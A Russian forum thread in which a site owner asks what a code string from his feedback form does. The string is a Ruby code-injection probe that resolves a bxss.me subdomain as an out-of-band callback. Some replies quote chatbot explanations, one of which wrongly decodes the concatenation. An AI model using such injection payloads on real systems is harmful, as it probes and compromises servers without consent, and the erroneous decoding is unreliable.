Помогите расшифровать код, из любопытства

12
B
На сайте с 07.10.2013
Offline
82
1462

Всем привет!

В форму обратной связи получил любопытный код. Онлайн интерпретатор выдает ошибку. На хостинге не решил его запускать.

Прошу помочь его раскодировать, из любопытства хочется узнать, что там ?

'A'.concat(70-3).concat(22*4).concat(113).concat(71).concat(108).concat(78)+(require'socket' Socket.gethostbyname('hitod'+'glkgdinyda2b9.bxss.me.')[3].to_s)

LEOnidUKG
На сайте с 25.11.2006
Offline
1762
#1

Это же JS код. Код не весь вроде как. Нет  to_s, но по сути создаётся запрос к некому сайту.

Просто пытаются или куки собрать или что-то внедрить в браузер.

Я бы добавил стоп-слова в обратную связь, чтобы такие коды просто пропускались и не доходили.

✅ Мой Телеграм канал по SEO, оптимизации сайтов и серверов: https://t.me/leonidukgLIVE ✅ Качественное и рабочее размещение SEO статей СНГ и Бурж: https://getmanylinks.ru/ ✅ Настройка и оптимизация серверов https://getmanyspeed.ru/
Resett
На сайте с 10.04.2012
Offline
143
#2

Данный код напоминает фрагмент на языке программирования Ruby, в котором используется цепочка конкатенаций (сложения строк) с последующим выполнением сетевого запроса. Давайте разберем его по частям:

  1. 'A'.concat(70-3) - к строке "A" добавляется результат выражения 70-3 , что равно 67. В ASCII коде 67 соответствует символу "C", так что результатом будет "AC".

  2. .concat(22*4) - к текущему результату "AC" добавляется результат выражения 22*4 , что равно 88. В ASCII это "X", получаем "ACX".

  3. .concat(113) - к "ACX" добавляется символ с ASCII кодом 113, это "q", получаем "ACXq".

  4. .concat(71).concat(108).concat(78) - далее добавляются символы с ASCII кодами 71 ("G"), 108 ("l"), и 78 ("N"), в итоге имеем строку "ACXqGlN".

  5. +(require'socket' Socket.gethostbyname('hitod'+'glkgdinyda2b9.bxss.me.')[3].to_s) - здесь код становится сложнее. Этот фрагмент загружает библиотеку socket , выполняет запрос на разрешение имени хоста, складывает полученный результат с предыдущей строкой. Скорее всего, это часть кода, используемая для сетевого взаимодействия или в качестве попытки выполнить вредоносные действия, так как bxss.me известен в контексте использования в кибератаках.

Такой код может быть использован для маскировки вредоносных действий или взаимодействия с удаленным сервером в целях получения дополнительных инструкций или отправки данных. Использование такого кода в своем проекте или при выполнении неизвестного скрипта может быть рискованным.

Сами знаете, откуда ответ)

B
На сайте с 07.10.2013
Offline
82
#3

> Данный код напоминает фрагмент на языке программирования Ruby, в котором используется цепочка конкатенаций

Если у получателя нет интерпретатора Ruby , то код не исполнится ...
Какой смысл тогда этот код отправлять в форму обратной связи на сайте?

А
На сайте с 09.10.2013
Offline
116
#4
Resett #:

Сами знаете, откуда ответ)

У меня чуть иначе ответил)

Разбор кода
'A'.concat(70-3).concat(22*4).concat(113).concat(71).concat(108).concat(78)

Здесь используется метод concat строки 'A' и ряда чисел. Разберем каждую операцию:

'A' - это просто строка "A".
70-3 = 67
22*4 = 88
113, 71, 108, 78 - просто числа.
Таким образом, 'A'.concat(67).concat(88).concat(113).concat(71).concat(108).concat(78) эквивалентно 'A' + '67' + '88' + '113' + '71' + '108' + '78', что даст строку "A67881137108178".

(require'socket' Socket.gethostbyname('hitod'+'glkgdinyda2b9.bxss.me.')[3].to_s)

Здесь используется библиотека socket для выполнения DNS-запроса. Рассмотрим шаги подробнее:

require 'socket' - подключение библиотеки socket.
Socket.gethostbyname('hitodglkgdinyda2b9.bxss.me.') - выполняет DNS-запрос для домена 'hitodglkgdinyda2b9.bxss.me.'. Возвращает массив, где третьим элементом (индекс 3) будет IP-адрес в строковом формате.
.to_s - приводит этот IP-адрес к строковому типу.
Сводный итог
Теперь объединим обе части:

'A'.concat(67).concat(88).concat(113).concat(71).concat(108).concat(78) даст строку "A67881137108178".
Результат DNS-запроса будет добавлен к этой строке.
Заключение
Этот код выполняет две функции:

Формирует строку "A67881137108178".
Выполняет DNS-запрос к домену 'hitodglkgdinyda2b9.bxss.me.' и добавляет IP-адрес к сформированной строке.
Внимание
Использование данного кода может быть потенциально опасным, поскольку он выполняет сетевой запрос к внешнему серверу (bxss.me). Этот домен обычно используется для тестирования уязвимостей (Blind XSS), что может означать, что кто-то проверяет вашу систему на уязвимости. Поэтому рекомендую не запускать такой код на реальном сервере.
B
На сайте с 07.10.2013
Offline
82
#5

Сами знаете, откуда ответ)

Не знаю, подскажите!

Гигчат от сбера - завис на моем вопросе.

png 8ebj1n_fb3ph9_y3_2024-07-23_09-30-34.png
B
На сайте с 07.10.2013
Offline
82
#6
хотя, ответил на часть вопроса:
'A'.concat(70-3).concat(22*4).concat(113).concat(71).concat(108).concat(78)

B
На сайте с 07.10.2013
Offline
82
#7
Албена #:
Формирует строку "A67881137108178".

и чем опасна эта строка ?

В чем смысл?

W1
На сайте с 22.01.2021
Offline
306
#8
botir #:
Не знаю, подскажите!

Чатжопити.

Мой форум - https://webinfo.guru –Там я всегда на связи
Z0
На сайте с 03.09.2009
Offline
805
#9
botir :

Всем привет!

В форму обратной связи получил любопытный код. Онлайн интерпретатор выдает ошибку. На хостинге не решил его запускать.

Прошу помочь его раскодировать, из любопытства хочется узнать, что там ?

'A'.concat(70-3).concat(22*4).concat(113).concat(71).concat(108).concat(78)+(require'socket' Socket.gethostbyname('hitod'+'glkgdinyda2b9.bxss.me.')[3].to_s)

mysql инъекция, не?

broken finger
На сайте с 22.06.2022
Offline
25
#10
ziliboba0213 #:

mysql инъекция, не?

А где там запрос к базе?

12

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий